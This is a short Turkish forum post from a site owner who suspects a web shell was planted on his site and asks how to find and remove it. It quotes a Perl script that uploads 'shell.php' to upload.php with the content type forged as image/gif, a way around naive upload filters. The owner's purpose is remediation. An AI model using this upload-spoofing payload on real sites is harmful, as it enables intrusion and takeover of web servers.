Merhaba.
Uploads klasöründe content-type kontrolünün yeterli olacağını zannediyordum. Ancak
şeklinde perl scripti ile content-type ın yanıltılabildiğini öğrenmiş bulunmaktayım.Kod:use LWP; use HTTP::Request::Common; $ua = $ua = LWP::UserAgent->new;; $ua->proxy('http', 'http://deneme.com/'); $res = $ua->request(POST 'http://deneme.com/upload.php', Content_Type => 'form-data', Content => [ userfile => ["shell.php", "shell.php", "Content-Type" => "image/gif"], ], ); print $res->as_string();
Şimdi bu durumda sitemde bazı gizli linkler keşfettim (PageRank hırsızlığı yani)
Sistemime shell atıldığından şüpheleniyorum. Shell dosyalarını nasıl bulup silerim ?
Sistemi temizlemek için yapmam gerekenler nelerdir?
Teşekkürler



LinkBack URL
About LinkBacks
Alıntı Yaparak Yanıtla
. 

Sık Kullanılanlar